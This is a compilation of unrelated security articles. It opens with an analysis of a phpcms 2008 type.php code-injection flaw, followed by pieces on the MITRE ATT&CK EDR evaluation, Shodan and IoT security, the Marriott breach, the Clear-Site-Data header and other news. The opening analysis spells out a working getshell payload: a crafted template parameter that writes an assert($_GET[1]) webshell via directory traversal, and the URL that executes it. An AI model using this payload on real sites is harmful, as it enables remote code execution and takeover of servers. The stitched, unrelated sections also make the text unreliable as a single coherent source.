
phpcms 2008 type.php Front-End Code Injection (getshell) Vulnerability Analysis



In type.php:

<?php
require dirname(__FILE__).'/include/common.inc.php';
...
if(empty($template)) $template = 'type';
...
include template('phpcms', $template);
...
?>

First, look at include/common.inc.php, which is pulled in by the require. At line 58 of that file we find the following code:

if($_REQUEST) {
    if(MAGIC_QUOTES_GPC) {
        $_REQUEST = new_stripslashes($_REQUEST);
        if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);
        extract($db->escape($_REQUEST), EXTR_SKIP);
    } else {
        $_POST = $db->escape($_POST);
        $_GET = $db->escape($_GET);
        $_COOKIE = $db->escape($_COOKIE);
        @extract($_POST, EXTR_SKIP);
        @extract($_GET, EXTR_SKIP);
        @extract($_COOKIE, EXTR_SKIP);
    }
    if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS);
    if($_COOKIE) $db->escape($_COOKIE);
}

The @extract() calls above register any request variables that have not yet been defined; on a conflict they do not overwrite existing variables. Through this pseudo-global registration, the assignment in if(empty($template)) $template = 'type'; can be bypassed, i.e. the $template variable is attacker-controlled.
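To see the entry point in isolation, here is a minimal sketch (not the phpcms source) of how the pseudo-global registration interacts with the later default assignment; it assumes a request such as type.php?template=tag_xxx:

<?php
// minimal sketch, not phpcms code: common.inc.php registers request variables first
@extract($_GET, EXTR_SKIP);              // $template is not defined yet, so EXTR_SKIP does not skip it
if(empty($template)) $template = 'type'; // never reached when ?template= is supplied
echo $template;                          // the attacker-supplied value flows on into template('phpcms', $template)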

Following into the template() function, defined at include/global.func.php:772:

function template($module = 'phpcms', $template = 'index', $istag = 0) {
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    if(TPL_REFRESH && (!file_exists($compiledtplfile)
        || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile)
        || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile))) {
        require_once PHPCMS_ROOT.'include/template.func.php';
        template_compile($module, $template, $istag);
    }
    return $compiledtplfile;
}

Several checks happen here. TPL_REFRESH indicates whether automatic template-cache refreshing is enabled (it defaults to 1); the remaining conditions determine whether the cached copy is stale. If the cache needs to be regenerated, execution enters template_compile(), which, per the require_once on the previous line, is defined at include/template.func.php:2.

<?php
function template_compile($module, $template, $istag = 0) {
    $tplfile = TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html';
    $content = @file_get_contents($tplfile);
    if($content === false) showmessage("$tplfile is not exists!");
    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
    $content = ($istag || substr($template, 0, 4) == 'tag_') ?
        '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' :
        template_parse($content);
    $strlen = file_put_contents($compiledtplfile, $content);
    @chmod($compiledtplfile, 0777);
    return $strlen;
}

Focus on the line $content = ($istag || substr($template, 0, 4) == 'tag_') .... Because $template is controllable, any value starting with tag_ makes the ternary expression take its first branch, which is equivalent to:

$content = '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>'

Because $template is not filtered and is concatenated directly into the content, supplying tag_(){};@unlink(__FILE__);assert($_GET[1]);{//../rss as the template produces the following result:

$content = '<?php function _tag_phpcms_tag_(){};@unlink(__FILE__);assert($_GET[1]);{//../rss($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>'

As you can see, the one-line webshell has now been written into $content, after which file_put_contents($compiledtplfile, $content); writes it out to a file.

Back in the template_compile() function above, TPL_CACHEPATH is the constant PHPCMS_ROOT.'data/cache_template/'; so $compiledtplfile is:

$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';

That is:

$compiledtplfile = 'data/cache_template/phpcms_tag_(){};@unlink(__FILE__);assert($_GET[1]);{//../rss.tpl.php';

So the ../ near the end of the payload uses directory traversal to make the final $compiledtplfile resolve to 'data/cache_template/rss.tpl.php'.
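Putting the pieces together, the first-stage request would look roughly like the following. This is a reconstruction from the entry point and payload described above, not a string quoted from the original write-up, and the special characters would normally be URL-encoded:

http://127.0.0.1/phpcms/type.php?template=tag_(){};@unlink(__FILE__);assert($_GET[1]);{//../rss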


[Screenshot: contents of the generated cache template file]

To keep the file parseable, the // near the end of the payload comments out the rest of the concatenated code, as shown in the screenshot above.

After that, visit http://127.0.0.1/phpcms/data/cache_template/rss.tpl.php?1=phpinfo() to execute the injected code.



Putting the MITRE ATT&CK Evaluation into Context


Today, MITRE published the results of their first public EDR product evaluation. This effort was a collaboration between MITRE and seven EDR vendors to understand how various products can be used to provide security teams with visibility into post-compromise adversary techniques. In the test, MITRE executed a set of techniques using open source methods mirroring previously-observed APT3 techniques. In their write-up, they’ve supplied information about how vendors provided alerting and/or visibility into data associated with their execution of a technique.

This is an extremely valuable contribution to the infosec community. Frank, Katie, Blake, Chris and others at MITRE should be applauded for all the hours and energy they poured into generating this groundbreaking body of knowledge. The testing was well organized, the data captured thorough, and the finalization of results fair and collaborative. That last point is especially noteworthy given the huge amount of nuance and inherent lack of any one universal “right way” to address much of ATT&CK. This evaluation is a great achievement from MITRE, and we look forward to working with MITRE on continually refining the process and participating in future tests.

As we reflect on the test and what it means, we would like to add some perspective to put the results into context.

Why the MITRE ATT&CK evaluation is valuable and important

Product testing is not new. Endgame is a participant in public testing and an active member of the Anti-Malware Testing Standards Organization (AMTSO). Transparency and openness are foundational Endgame operating principles. Not being afraid of competitive testing and evaluation is a necessary part of that, despite every independent test having different imperfections. We welcome it.

What is new about this test is that it entirely emphasizes post-compromise visibility. Depending on how you look at it, that has either been intentionally ignored by public evaluations until now or has been a complete or near-complete blind spot for them. This matters. Why?

The community has become increasingly aware that it’s not all about exploit and malware blocking. Adversaries can perform operations using nothing but credentials and native binaries. Whether from a vendor or a result of home-grown detection engineering, none of our detections or protections are immune to bypass, no matter anyone’s claims. Organizations need to assume they’re breached and build security programs which allow for the discovery of active attackers in the environment.

MITRE ATT&CK is by far the best, most authoritative knowledge base of techniques to consider in building a detection program which includes the “assume breach” concept. All organizations require tooling to give them data and detection capabilities, whether they build their own or, as most do, work with one or more vendors to provide data gathering, querying capabilities, alerting, and other components.

The ATT&CK product evaluation provides a good reference dataset highlighting various methods of detection. It starts to move towards a taxonomy describing types of detection and visibility - the taxonomy MITRE has given us is complex and perhaps imperfect, but that’s reflective of the problem as a whole. It’s not a simple yes/no answer or a numeric score, like typical tests which measure whether a piece of malware was blocked or not. Most importantly, the evaluation moves us forward in emphasizing the fundamental importance of data visibility when it comes to building a program and considering tooling.

The MITRE evaluation isn’t everything

The evaluation provides a massive amount of data and people will naturally wonder how to action that information. As we’ve described before (and we’re not the only ones), ATT&CK is not a measuring stick. It’s a knowledge base. Trying to use it as a universal, quantitative measurement device is a recipe for failure.

We could probably spend entire posts delving into each of these items, and this list isn’t comprehensive, but some of the pitfalls and challenges inherent to trying to quantify ATT&CK include:

- Not considering real world scenarios. In the real world, you don't need to detect or block every component of an attack to disrupt an adversary or remediate an action. We build layered behavioral preventions and detections for our customers. These layers, working together, provide a vanishing probability of missing a real attack, even if we know it's likely we won't alert on every action taken in an attack. We know individual protections will sometimes miss or be bypassed. Similarly, incident responders will tell you that it's a pipe dream if you ever imagine you will have a completely airtight picture of every technique used by an adversary in a known breach. 100% visibility is not necessary for effective remediation.
- Lack of prioritization or weighting of techniques. Is deep, signatureless coverage of process injection more important than knowing that an attacker base64 encoded something on an already compromised box? For any enterprise team I can conceive of, yes, injection coverage is dramatically more important. There's no notion of prioritization between techniques in ATT&CK. See this post we did last year for a deeper dive into ways technique coverage could be prioritized by teams according to their particular threat landscape and interests. MITRE hasn't included prioritizations for a reason: it is not a weighted measurement tool, it's a knowledge base. Turning it into a score sheet can be counterproductive.
- ATT&CK is incomplete. MITRE does a great job updating ATT&CK as new techniques become known. This regularly happens due to white hat security research, adversary evolution, and new threat reporting. ATT&CK is by definition always behind the cutting edge in the real world, and it has gaps. The level of specificity in a given technique also varies widely. We are excited about the future decomposition of techniques into sub-techniques, as there are usually a number of known methods to invoke a single technique. In this particular evaluation, you'll note some cases where MITRE chose a few different ways to implement a single technique. This is good and reflective of reality. But there are a huge number of untested alternative implementations even for the techniques used in this evaluation. Testing everything would be nearly impossible.
- Noise in production. Is an alert better than telemetry? Sometimes yes, sometimes no. The majority of the activity described in ATT&CK is seen in most enterprises on a daily basis. We cannot seek alerting coverage across all of ATT&CK. It would overwhelm security teams with noise and FPs. Taking that idea further, we shouldn't even overextend in an attempt to provide visibility into every cell - there are diminishing returns in the real world in doing so.
- Data robustness. Not all data is created equal in terms of enrichments and hardening against adversaries determined to get around your EDR solution. There's a growing body of research around this topic, for example this excellent talk by William Burgess called "Red Teaming in the EDR Age." We highly recommend it and similar work to anyone considering visibility. Many common sources of EDR data can be undermined by an attacker with access. At Endgame, we put a lot of effort into hardening our data sources. Not all EDR vendors do the same. This is an important factor, but one which would not be easy to measure in an evaluation.
- Evaluating the tool or the team? For a nuanced evaluation such as this, some amount of expertise and knowledge is required. In the MITRE evaluation, vendors were invited to deploy, configure, and participate in the evaluation on the blue team side. This makes tremendous sense, as MITRE had enough work to do beyond overcoming the often steep learning curve of the various EDR products. Endgame takes great pride in how readily our customers can consume and make use of advanced capabilities compared with the deep expertise required for other tools in this space. Assessing usability and accounting for a security team's expertise would be very hard in an evaluation.
- Not a full product assessment. Visibility is one important component of any endpoint security tool. Other important components include prevention, hardening (discussed above), response, usability, and a host of considerations around topics like deployment, endpoint impact, network impact, and more.

None of this is intended as a criticism of MITRE’s evaluation. In fact, they’ve taken care not to overstate what the test is by providing information about evaluated products that is narrowly scoped around post-compromise visibility. They haven’t attempted to score or rank vendor products, and neither should we.

Even teams new to ATT&CK should be working to incorporate it into their security program. There is a lot to consider, but there are ways to get started by taking small bites out of the huge ATT&CK sandwich. We've recently written about this topic, with some of that information available here.

What about Endgame’s evaluation?

We are pleased with how the evaluation describes our capabilities. Our agent provides visibility into the vast majority of techniques tested by MITRE in the evaluation, using a good balance of alerting behavioral detections and straightforward visibility into activity via our telemetry. Some of the noteworthy items in the results include:

- ATT&CK Integration. The results showcase our product's long-standing ATT&CK integration, where behavioral detections are linked to ATT&CK.
- Access to Telemetry. MITRE's results detail our interactive process tree, Endgame Resolver. Telemetry is easily visible from this tree. It's not readily apparent from static screenshots, but the entire tree is interactive and response actions can be taken right from the tree.
- Enrichments. Custom enrichments are shown for ATT&CK-relevant items that didn't make sense for alerting. For example, execution of ipconfig doesn't create alerts on its own, but if it is related to processes with higher confidence alerting, the potential security relevancy of that ipconfig execution is highlighted for the user.
- Memory Introspection. In-memory artifact capture is also showcased in the evaluation, with artifacts such as strings present in injected threads automatically captured for inspection.
- Everyone Has Gaps and Differences. Some visibility gaps exist, and for most of those, we already have robust solutions in flight. For example, our customers will be excited to see enhanced network data capture in our next monthly release. In this ATT&CK evaluation, none of these gaps are news to us and we have some disagreement reflected in the Notes about whether some are actually gaps versus differences in evaluator expectations and workflow. That said, we look forward to continual assessment and relentless improvement.

What's next?

We’re proud to have participated in this evaluation and look forward to participating again, should MITRE continue to lead evaluations. We look forward to continued collaboration with MITRE on ways to design and run both this evaluation and other competitive testing through our participation in AMTSO. And, we’ll continue to contribute to the community’s overall understanding of how to build a security program, including how to operationalize ATT&CK. And, of course, we’ll keep building and enhancing the Endgame platform for our current and future customers.

OpenShift Commons Briefing: Container Deployment and Security Best Practices Joh ...

OpenShift Commons Briefing Summary

In this briefing, Twistlock’s John Morello and Red Hat’s Dirk Herrmann gave an in-depth look at the recent NIST Special Publication SP800-190 on Container Security and why it matters if you are deploying containers. They covered best practices for achieving the SP800-190 recommendations on OpenShift.

Access the slides from this briefing: Container Deployment and Security Best Practices NIST 800 190 Briefing

Link to the NIST Special Publication 800-190 Application Container Security Guide

Join the Community at the Upcoming OpenShift Commons Gathering in Seattle! Dec 10th @ Kubecon

We’re also excited to announce that the upcoming OpenShift Commons Gathering will be taking place December 10, 2018 in Seattle, co-located once again with CNCF’s KubeCon & CloudNativeCon. The OpenShift Commons Gathering brings together experts from all over the world to discuss real-world implementations of container technologies, best practices for cloud native application developers and the upstream open source software projects that make up the OpenShift ecosystem.

Confirmed Keynotes and Speakers from Red Hat already include:

- AMA Panel with OpenShift Product Managers and Engineering leads
- Chris Wright on Emerging Technology and Innovation
- Reza Shafii on Red Hat's Unified Hybrid Cloud
- Clayton Coleman & Mike Barrett on OpenShift 3.x: Features/Functions/Future
- Diane Mueller on Cross-Community Collaboration with Upstream
- Sebastian Pahl on Operator Framework

More speakers and panelists are being added; check out the agenda for updates. Please note: pre-registration is required. To register, add the OpenShift Commons Gathering as a co-located event during your KubeCon + CloudNativeCon registration.

Blue Helix’s BHEX Exchange Raises $15 Million to Reshape Crypto Trading Securit ...


A decentralised platform aimed at providing a custody and clearing product for crypto assets has seen its BHEX Exchange raise $15 million in funding.

The new funding for Blue Helix came from the likes of Huobi Global, OKCoin, Genesis Capital, Node Capital, City Holdings, and Yintai Investment, to name a few. According to an announcement, the money raised will go toward delivering a new level of security to the crypto trading industry via the next-generation digital asset trading platform.

BHEX will officially launch at the end of November.

Demand for BHEX’s investment subscription has attracted over 70 investment opportunities, 40 of which Blue Helix selected to take part in its first round of Token Fund strategic investment.

James Ju, founder and CEO of BHEX said: “Bluehelix technology will be an open source project after it has been completely developed, it will be supported by decentralised cryptographic algorithms, blockchain technology, and the innovative Bluehelix technology.”

The announcement goes on to say that Blue Helix is committed to providing a decentralised platform and states it has simplified one-off asset exchanges by executing an automatic trade upon price match.

Not only that, but it’s also aiming to reshape the security and credibility issues of centralised crypto trading platforms. The platform notes this is achieved by permitting centralised exchanges to enjoy the benefits of decentralised exchanges while solving the key holder problem and placing the power back into the user’s hands.

Through its BHPOS consensus mechanism, asset custody and clearing is managed and supervised by the whole community. This includes storing transactions onto blockchains, cold and hot wallet segmentations, multi-layer signatures, and community asset clearing consensus mechanisms.

According to Blue Helix, this will enable the distribution management and supervision of asset custody while enabling peer-to-peer settlements. Crypto custody services are an important facet of the ecosystem, as can be seen from the likes of Coinbase's institutional-grade custody service or asset manager Fidelity Investments' own crypto custody service for Bitcoin and Ethereum.

The Likelihood of a Cyber Attack Compared


While the cost of a cyber attack is often discussed, we seldom hear about just how common these attacks actually are. Numerous security experts believe that a cyber attack or breach of catastrophic proportions is no longer a matter of if, but a matter of when.

According to the World Economic Forum’s 2018 Global Risks Report , the top three risks to global stability over the next five years are natural disasters, extreme weather and cyber attacks. When it comes to preparing for the physical risks, we are quick to board up our windows and evacuate to safer locations.

Why is it that we don’t take the same precautions when it comes to protecting ourselves from cyber attacks ― despite the fact that it’s one of the top three safety risks we face?

One likely reason that people don’t take the precaution of protecting their IT systems is that many believe an attack is one of those things that just won’t happen to them. So, we decided to take a look at the likelihood of other “won’t happen to me” events, to paint a clear picture of just how common a cyber breach really is.


[Infographic: The Likelihood of a Cyber Attack Compared]

If the chances of a breach at 1 in 4 weren’t enough to make you think twice about your cyber security, here’s a few more stats to help put things in perspective:

- There is an estimated cyber attack every 39 seconds
- Since 2013, there have been 3.8 million records stolen every single day
- The average cost of a data breach is estimated to exceed $150 million by 2020

While it can be easy to write off a cyber attack as one of those things that will never happen to you, they are one of the top three risks we face in modern day society. With 230,000 new malware samples appearing every day, being proactive with your cybersecurity is more critical now than ever.

Uncover where your biggest security risks lie with a data risk assessment ― Varonis is here to help protect you from becoming another cyber attack statistic.

Sources:

Insider | Tech Republic | Fix | Security Intelligence | Weather | Nationsearch | CNBC | National Park Service | The Balance | Forbes

IoT Security in the Shodan Age

Introduction

The landscape of IoT has been changed completely since the appearance of Shodan, a search engine that lets users find Internet-connected devices such as traffic lights, webcams, routers, security cameras and more. Shodan crawls the Internet, looking for publicly-accessible devices in the IoT ― many of which have minimal security. It’s been online for almost ten years.

Despite this fact, manufacturers have not been responsive to the potential threat posed by Shodan and services like it. It most likely will not be long until a massive global hack occurs that exposes millions, potentially billions, to devastating consequences.

This article will address how Shodan changed the landscape of IoT, why this problem is a manufacturer problem, and how security can evolve to tackle this problem. You should have a good grasp on the subject of IoT Security in the Shodan Age by the time you are done reading this article.

How Did Shodan Change the Landscape of IoT?

It is important to begin with the fact that Shodan was not the first tool hackers could use to attack IoT devices. This article will not be a doom-and-gloom, end-of-the-world vision of Shodan, because the basic fact is that IoT devices are hackable with or without it. Period.

However, Shodan has made it far easier to access IoT devices remotely, and in some cases shockingly so. Answering the bellyaching of big tech companies for the need to monitor their devices, Shodan was created in 2009. The immediate impact was that tech company employees, as well as pentesters, hackers and researchers, suddenly had the ability to monitor IoT devices such as webcams, security systems, garage doors and other IoT devices. Part of this was predicated on the fact that IoT devices often have weak default security protections. (But that will be discussed later.)

Dubbed “Google for hackers,” Shodan has been described as interesting, exciting and frightening.

Let’s say that you’re an information security professional with good knowledge of IoT but not familiar with Shodan. While Shodan has not revolutionized the IoT landscape, it has changed the way that IoT devices are accessed, which should raise some serious security red flags for those working in IoT security.

The first and most shockingly-powerful function of Shodan is that it allows you to find the physical location of any Internet-connected device. You can search for devices by their IP addresses, find IP addresses of devices, find out what ports the devices are using and even what operating systems they are running on. Shodan also lets you search for a connected device’s default security credentials, the device’s domain or subnet, known vulnerabilities and even ports that are currently open. As you can see, Shodan has changed the field by allowing you to retrieve a substantial information profile on connected devices.
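As a rough sketch of what building such a profile looks like programmatically, the snippet below queries Shodan's REST search endpoint. The API key is a placeholder, and the endpoint path and response fields (matches, ip_str, port, org) are recalled from memory, so treat the details as illustrative rather than authoritative:

<?php
// rough sketch: search Shodan for Internet-connected devices matching a query
$key   = 'YOUR_API_KEY';                      // placeholder, requires a Shodan account
$query = urlencode('webcam');                 // any Shodan search query
$json  = file_get_contents("https://api.shodan.io/shodan/host/search?key={$key}&query={$query}");
$data  = json_decode($json, true);
foreach ($data['matches'] as $match) {
    // each match describes one indexed device: IP address, open port, owning organisation, etc.
    echo $match['ip_str'] . ':' . $match['port'] . ' - ' . ($match['org'] ?? 'unknown org') . PHP_EOL;
}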

The biggest real-world change to the IoT landscape is the change in scale: No connected device is off-limits. Maybe twenty-five years ago or so, the ability to physically locate and access a connected device would not pose much of a security risk. This is in part because nothing much of true importance was connected to the Internet. Now things are quite different with Shodan, where paying a small monthly fee gives users the ability to search for connected devices to their heart’s content.

Why Is This a Manufacturer Problem?

The security problem that exists between Shodan and Internet-connected devices rests solely in the laps of device manufacturers. This problem can likewise be fixed by manufacturers.

The simple fact is that connected-device manufacturers have been falling off in the department of device security. Most commonly, connected devices come with weak passwords loaded as the default password or even with no passwords at all. This may seem like a small problem, but as time goes on, this problem will increase exponentially as more and more consumers stock their homes with connected devices.

Despite what device manufacturers may think, the average consumer is still pretty non-tech-savvy and may not have the technical awareness to manually check their device security configurations. In situations like these, devices with weak passwords will suffer from ineffectual security and those without passwords will continue to be insecure. Of course, as soon as the first major hack hits the IoT, major security overhauls may occur fairly quickly ― though the hope is to properly remedy the problem so that Zero Day never comes.

With this said, manufacturers are clearly in the best position to prevent this problem from occurring in the first place. A simple change to the default security configuration is all that is needed to stop this problem, and surely this would work for consumer-connected devices. However, ICS and critical infrastructure-controlled devices are another issue indeed.

How Can Security Evolve?

One of the most important things to take away from this article is the fact that this problem can be resolved relatively easily, compared to the looming threat of a coming massive hack of IoT. Below are recommendations for how security can evolve to meet this rising new challenge.

Connected Device Security Training

First, and most important, is IoT-connected device security training for individuals and those working in critical infrastructure. The funny thing is that although critical infrastructure employees have far more at stake in terms of configuring their connected devices properly, the training would more or less be the same.

The crux of the training should cover connected device security passwords and how to change the default security password. This simple change would even the security playing field and make the ability to access a connected device have a similar difficulty level as, say, hacking into a business server.

Changes to Authentication

Another way that security can evolve in a smart direction is by using multi-factor authentication with your IoT devices. It should come as no surprise that this recommendation comes after you are trained on your device security, because a solid security password is fundamental to the whole security process. There are different ways that you can implement multi-factor authentication, so make sure that you find one that suits your organization’s connected device schema.

Security Updates and Patches

Without a doubt, making sure your devices are up to date with the latest security updates and patches has been in the lexicon of just about every PC user since the 1990s. Common sense says that this old responsibility would naturally flow to IoT devices, and it should not be shocking that this is the case. IoT devices need to be updated fully with all the latest patches, because hackers exploit IoT devices that are lacking in the security updates and patch department.

HTTPS

Using HTTPS on IoT devices is another great way to deal with the advent of broad IoT search tools like Shodan. As things stand now, HTTPS is already commonly used in the back end of IoT, such as by application and web servers. This convenience, coupled with the inherent security, makes using HTTPS with your IoT devices a home-run move.

Conclusion

Shodan has been quite the moving force on the IoT landscape in the almost decade that it has been in existence. While it may have made it easier for hackers to access and attack devices, this fact should be used as a learning experience for those who use IoT devices. Simply tightening up your security passwords, and especially changing them from their abysmal default settings, will fix most of the security issues stemming from Shodan with a good amount of room for IoT security to evolve in response.

Sources:
- What is Shodan? The search engine for everything on the Internet, CSO
- Dark Side of the IoT? Shodan Search Engine, RTInsights
- A Beginner’s Guide to Securing Your IoT Devices, IoT for All

Marriott hotel chain reveals data breach that affected 500 million customers


Facepalm: Another day, another data breach ― and this one’s a biggie. Hotel chain Marriott has announced “a data security incident” that saw the details of around 500 million guests stolen from its reservation database.

In a statement, the company said that “unauthorized access” to the Starwood guest reservation database in the United States was detected on or before September 10. It found that the attacker(s) had been able to infiltrate the network since 2014.

327 million of the pilfered records include some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation dates, and communication preferences.

Worryingly, the chain says that some information also includes payment card numbers and payment card expiration dates. Although this data was encrypted, there are two components needed to decrypt the payment card numbers, and Marriott has not been able to rule out the possibility that both were taken.

Marriott is now working with law enforcement and has begun notifying regulatory authorities. It is informing customers of the breach, including those in the US, Canada, and the UK.

“We deeply regret this incident happened,” said Arne Sorenson, Marriott’s President and Chief Executive Officer. “We fell short of what our guests deserve and what we expect of ourselves. We are doing everything we can to support our guests, and using lessons learned to be better moving forward.”

At 500 million affected guests, the data breach is one of the 21st century’s biggest, placing it behind only the Yahoo hack that exposed three billion user accounts .

The exact nature of the Marriott breach has not been revealed, but Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge , believes it was related to insecure web applications. “Many large companies still do not even have an up2date inventory of their external applications, let alone conducting continuous security monitoring and incremental testing. They try different security solutions without a consistent and coherent application security strategy. Obviously, one day such an approach will fail,” he said.

Image credit: Shutterstock

A new Security Header: Clear Site Data


I was debating whether or not to call Clear Site Data a Security Header but in the end I decided I would. During the use of a web app we can leave various pieces of data in the browser that we'd like to clear out if the user logs out or deletes their account. Clear Site Data gives us a reliable way to do that.

Storing Data

We potentially store all kinds of data on a user's device during the use of our site including cookies, cache, localStorage, sessionStorage, things like service worker registrations and much more. The Clear Site Data header gives us a reliable way to ensure that we delete any and all such data when we need or want to. Clearing cookies can be difficult unless you have an exhaustive list of all cookies that may be set and there's no reliable way at all to interact with the network cache in a browser either. Clear Site Data presents a reliable option to do all of this.

Clear Site Data

You can read the RFC for more details, but I'm going to cover all of the basics here. If at any point you want to clear some data from the browser, say the user logs out or deletes their account, you return the Clear-Site-Data header and configure it to remove the data you'd like. There are currently 4 options for the type of data you can remove with the header; here are the snippets from the spec.

"cache" - The cache type indicates that the server wishes to remove locally cached data associated with the origin of a particular response’s url. This includes the network cache, of course, but will also remove data from various other caches which a user agent implements (prerendered pages, script caches, shader caches, etc.)

"cookies"- The cookies type indicates that the server wishes to remove cookies associated with the origin of a particular response’s url. Along with cookies, HTTP authentication credentials, and origin-bound tokens such as those defined by Channel ID and Token Binding are also cleared.

"storage"- The storage type indicates that the server wishes to remove locally stored data associated with the origin of a particular response’s url. This includes storage mechansims such as ( localStorage , sessionStorage , [INDEXEDDB], [WEBDATABASE], etc), as well as tangentially related mechainsm such as service worker registrations.

"executionContexts"- The executionContexts type indicates that the server wishes to neuter and reload execution contexts currently rendering the origin of a particular response’s url.

"*"- The * (wildcard) pseudotype indicates that the server has the same effect as specifying all types.

When you'd like to clear one, some or all of these types of data from the browser then you simply issue the header on the response and configure it appropriately.

Clear-Site-Data: "cache", "cookies", "storage", "executionContexts"

Implementing on Report URI

I figured we had a great use case to deploy this on Report URI and test it out because we have user accounts that require auth, a logout feature and an account deletion feature too.

When a user logs out of their account, or deletes it, we now send the CSD header to make sure we've nuked anything that we may have left behind in their browser.

$this->session->sess_destroy();
$this->output->set_header('Clear-Site-Data: "cache", "cookies", "storage", "executionContexts", "*"');
$this->output->set_header('Location: /login/');
$this->output->set_status_header('302');

To make sure we get all types of data I've specified all 4 of the current types and the wildcard which should cover us for future additions to the spec too. That is one thing to watch though, if you use the wildcard today it may delete more than you expect in the future, so do bear that in mind! Here is our header being delivered on the logout page on my local test environment and this should be deployed to the live site by the time I publish.


[Screenshot: the Clear-Site-Data header delivered on the logout response]
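For anyone not on CodeIgniter, a minimal plain-PHP sketch of the same logout behaviour (illustrative only, not the Report URI implementation) would be:

<?php
// minimal sketch of a logout endpoint that sends Clear-Site-Data
session_start();
session_destroy();                      // drop the server-side session first
header('Clear-Site-Data: "cache", "cookies", "storage", "executionContexts"');
header('Location: /login/', true, 302); // send the user back to the login page
exit;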

Another thing to consider is protecting endpoints that deliver the CSD header against CSRF attacks. Hopefully things like your logout function already have CSRF protection, but the combination of being logged out with CSD shouldn't really change too much; it's just something to think about. You can see above that our logout feature is a simple GET request, but we do have a token in the path to detect and mitigate CSRF, so make sure you do the same whether it's GET or POST.
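As a hedged illustration of the kind of token check meant here (the parameter and session key names are hypothetical), a logout endpoint might verify the token before destroying the session and emitting the CSD header:

<?php
// sketch only: validate a per-session CSRF token carried in the logout URL
session_start();
$supplied = $_GET['token'] ?? '';
if (!hash_equals($_SESSION['csrf_token'] ?? '', $supplied)) {
    http_response_code(403);   // refuse logouts that lack a valid token
    exit;
}
// ...then destroy the session and send Clear-Site-Data as shown earlier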


Multiple Cybersecurity Initiatives Win 2018 U.S. Government Innovation Awards


On November 1, 2018, the 2018 U.S. government innovation awards were announced, with 36 public-sector innovation projects receiving the honor.

Some of the award-winning work in the cybersecurity field is summarized below:

(1) Missouri National Guard Cyber Team (MOCNET)

To dramatically cut software development time and reduce risk while preserving the integrity of existing applications, MOCNET developed the "Response Operation Collection Kit Network Security Monitoring" (RockNSM) solution, which integrates multiple open-source tools into a single platform for data collection and incident response. The technology drastically shortened the time needed to gather information from compromised servers, from 2 days down to 20 minutes. Beyond blocking threats, the platform can also identify traffic patterns so that, when traffic is anomalous, it improves prediction of attacker behavior and strengthens forensic capability.

(2) Small Business Administration (SBA)

When the Office of Management and Budget began focusing on modernizing Trusted Internet Connections (TIC), the SBA seized the opportunity to find a new solution that meets TIC requirements without being constrained by the standard architecture. The SBA used cloud-based security tools that are part of its existing Microsoft Azure and Office 365 licensing agreements. The solution gives the SBA a complete view of all of its IT assets, whether deployed internally or in the cloud, so they can be monitored and protected, fundamentally changing how it secures IT asset management.

(3) The State of Colorado

Election security problems mostly arise from front-end weaknesses such as voting machines, state registration websites, and online disinformation campaigns. In response, Colorado was the first to deploy a back-end vote verification technology that can promptly alert officials when something goes wrong in an election. ColoradoRLA, the open-source software the state rolled out, randomly samples regional paper ballots and compares them with the corresponding digital tallies, automatically flagging ballots when sufficiently significant discrepancies are found. Anyone can download ColoradoRLA for free and take its code apart to verify election results.

(4) Sandia National Laboratories

Sandia's primary mission is keeping the nation's nuclear weapons secure, so it faces very real threats. By its count, the lab's network experiences roughly 1.5 billion network events every day, including wrong password entries, phishing, and malware attacks. Sandia therefore developed the High-fidelity Adaptive Deception and Emulation System (HADES) to give operators the ability to counter intrusions. Although the deception environment HADES builds is isolated from Sandia's production systems and data, the developers made HADES an extremely realistic network that keeps attackers occupied for longer, allowing operators to monitor attacker behavior in real time and develop appropriate countermeasures.

Chengdu Library and Information Center, Chinese Academy of Sciences

Compiled by the Information Science and Technology Strategic Intelligence Team

Disclaimer: This article comes from the CAS Information Science and Technology Strategic Intelligence team; copyright belongs to the author. The content represents only the author's independent views and does not represent the position of 安全内参. It is republished in order to share more information. For reprints, please contact the original author for authorization.

Marriott Hotel Data Breach: Ongoing Since 2014


Marriott said that a massive data breach of its guest reservation system has left up to 500 million guests’ data exposed and available for the taking. Worse, the attackers may have had access to the systems for at least four years before being discovered.

The hotel company said in a statement on its website that hackers gained access to the Starwood reservation database. Starwood, which includes hotels like St. Regis and Sheraton, was bought by Marriott in 2016.

The hackers gained unauthorized access to Starwood's network back in 2014. Marriott said it discovered the breach on Sept. 8.

“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property,” the company said in its statement.

Marriott did not respond to a request for comment about how the database was accessed.

Marriott said that hackers stole data like name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences for 327 million of these guests.

For others, information stolen also includes payment card numbers and payment card expiration dates. The payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128), stressed the company.

“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken,” the company said. “For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”

Security experts, such as Daniel Cuthbert, global head of cyber security research at Banco Santander, were astounded that the hack has been ongoing for four years without discovery.

